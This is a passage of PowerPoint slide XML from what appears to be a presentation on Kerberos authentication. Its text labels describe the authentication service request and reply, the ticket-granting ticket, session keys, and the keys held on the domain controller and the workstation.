              <a:off x="3111530" y="3857260"/>
              <a:ext cx="2500581" cy="982189"/>
              <a:chOff x="3111530" y="3281929"/>
              <a:chExt cx="2500581" cy="982189"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="30" name="Rectangle 29"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3111530" y="3281929"/>
                <a:ext cx="2500581" cy="98218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spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:endParaRPr lang="de-DE" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="31" name="Picture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21235" y="3385910"/>
                <a:ext cx="304498" cy="447464"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3537365" y="4023091"/>
              <a:ext cx="2096279" cy="715581"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                <a:t>Pre</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>-Authentication Data</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Timestamp + Salt</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3221235" y="4839449"/>
            <a:ext cx="2142853" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ClearText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>UserName</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="190357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50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2. Authentication Service Reply</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="2000548"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The KDC‘s response contains:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TGS Session key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TKT for the KDC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TGS Session key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authorization data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Right Arrow 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3109495" y="3629803"/>
            <a:ext cx="2502616"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2. KRB_AS_REP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5223390" y="334075"/>
            <a:ext cx="2247679" cy="2346131"/>
            <a:chOff x="3657899" y="705967"/>
            <a:chExt cx="2247679" cy="2346131"/>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899" y="705967"/>
              <a:ext cx="2247679" cy="2346131"/>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3100" y="1017929"/>
              <a:ext cx="190699" cy="377609"/>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4301" y="1951358"/>
              <a:ext cx="185616" cy="272766"/>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67729" y="877139"/>
              <a:ext cx="185934" cy="273233"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="TextBox 36"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4255264" y="1075490"/>
              <a:ext cx="1468864" cy="656590"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="800"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1200" dirty="0"/>
                <a:t>Ticket Information</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="800"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1200" dirty="0"/>
                <a:t>Ticket-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1200" dirty="0" err="1"/>
                <a:t>Granting</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1200" dirty="0"/>
                <a:t> Service Session Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>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69631" y="1441289"/>
              <a:ext cx="219628" cy="219628"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="TextBox 41"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4247543" y="2119125"/>
              <a:ext cx="1468864" cy="656590"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="800"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1200" dirty="0"/>
                <a:t>Ticket-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1200" dirty="0" err="1"/>
                <a:t>Granting</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1200" dirty="0"/>
                <a:t> Service Session Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="800"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>User Credentials</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>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3945805" y="2560430"/>
              <a:ext cx="225134" cy="308918"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>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84171" y="2188402"/>
              <a:ext cx="219628" cy="219628"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Arrow Connector 18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4357936" y="1793064"/>
            <a:ext cx="718121" cy="15354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45" name="Group 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5771714" y="3212407"/>
            <a:ext cx="3209859" cy="2797046"/>
            <a:chOff x="5771714" y="3212407"/>
            <a:chExt cx="3209859" cy="2797046"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="46" name="Picture 4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05578" y="3394690"/>
              <a:ext cx="2973722" cy="2593105"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="TextBox 46"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6671087" y="3494731"/>
              <a:ext cx="1442703" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Domain Controller</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="TextBox 47"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6589790" y="3753727"/>
              <a:ext cx="1612173" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1200" dirty="0"/>
                <a:t>KDC Account Database</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="49" name="Picture 4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83374" y="4099924"/>
              <a:ext cx="327713" cy="327713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="TextBox 49"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6763295" y="4160207"/>
              <a:ext cx="1806580"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Service Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>System Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="51" name="Picture 5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71714" y="3212407"/>
              <a:ext cx="628030" cy="741586"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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19698" y="5247578"/>
              <a:ext cx="761875" cy="761875"/>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78170" y="4609048"/>
              <a:ext cx="351842" cy="351842"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="54" name="Content Placeholder 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195855" y="5119794"/>
              <a:ext cx="338649" cy="338649"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="55" name="Group 54"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="195776" y="3065461"/>
            <a:ext cx="2754116" cy="3099843"/>
            <a:chOff x="195776" y="3065461"/>
            <a:chExt cx="2754116" cy="3099843"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="65" name="Picture 6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49208" y="3212407"/>
              <a:ext cx="2700684" cy="2952897"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="75" name="TextBox 74"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="312812" y="3296511"/>
              <a:ext cx="2567940" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Workstation</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="76" name="TextBox 75"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="312813" y="3539877"/>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78" name="Picture 7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7240" y="4003155"/>
              <a:ext cx="327713" cy="327713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="80" name="TextBox 79"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="909969" y="4059289"/>
              <a:ext cx="1715503" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>User Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="82" name="Content Placeholder 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94316" y="5321279"/>
              <a:ext cx="338649" cy="338649"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86" name="TextBox 85"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="909969" y="5359479"/>
              <a:ext cx="1715503" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>System Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="87" name="TextBox 86"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="323229" y="4839449"/>
              <a:ext cx="2567940" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Workstation Credential Cache</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="88" name="Picture 8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5776" y="3065461"/>
              <a:ext cx="566691" cy="526075"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3111530" y="3857260"/>
            <a:ext cx="2500581" cy="1717663"/>
            <a:chOff x="3111530" y="3857260"/>
            <a:chExt cx="2500581" cy="1717663"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="Group 8"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3111530" y="3857260"/>
              <a:ext cx="2500581" cy="1717663"/>
              <a:chOff x="3111530" y="3857260"/>
              <a:chExt cx="2500581" cy="1717663"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="77" name="Rectangle 76"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3111530" y="3857260"/>
                <a:ext cx="2500581" cy="171766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spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:endParaRPr lang="de-DE" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="TextBox 7"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3692408" y="4152990"/>
                <a:ext cx="1806348" cy="1246495"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t>Ticket Information</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t>Ticket-</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                  <a:t>Granting</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t> Service Session Key</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t>Ticket-</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                  <a:t>Granting</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t> Ticket</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="81" name="Picture 8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78683" y="5132528"/>
                <a:ext cx="472016" cy="312696"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="84" name="Picture 8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237015" y="4003687"/>
                <a:ext cx="320987" cy="524624"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="18" name="Picture 1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186546" y="4573389"/>
              <a:ext cx="456290" cy="450726"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="69" name="Group 68"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="195776" y="3065461"/>
            <a:ext cx="2751911" cy="3099843"/>
            <a:chOff x="195776" y="3065461"/>
            <a:chExt cx="2751911" cy="3099843"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="70" name="Picture 6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47003" y="3212407"/>
              <a:ext cx="2700684" cy="2952897"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="71" name="TextBox 70"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="312812" y="3296511"/>
              <a:ext cx="2567940" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Workstation</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="72" name="TextBox 71"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="312813" y="3539877"/>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73" name="Picture 7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8866" y="3813752"/>
              <a:ext cx="327713" cy="327713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="74" name="TextBox 73"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="909969" y="3838689"/>
              <a:ext cx="1789823"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Ticket</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Ticket-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                <a:t>Granting</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t> Service Session Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="83" name="Content Placeholder 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94316" y="5613619"/>
              <a:ext cx="338649" cy="338649"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="85" name="TextBox 84"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="909969" y="5651819"/>
              <a:ext cx="1715503" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>System Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="89" name="TextBox 88"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="323229" y="5373216"/>
              <a:ext cx="2567940" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Workstation Credential Cache</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="90" name="Picture 8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5776" y="3065461"/>
              <a:ext cx="566691" cy="526075"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="91" name="Picture 9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36939" y="4254546"/>
              <a:ext cx="472016" cy="312696"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="92" name="Picture 9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78493" y="4680323"/>
              <a:ext cx="348452" cy="348452"/>
            </a:xfrm>
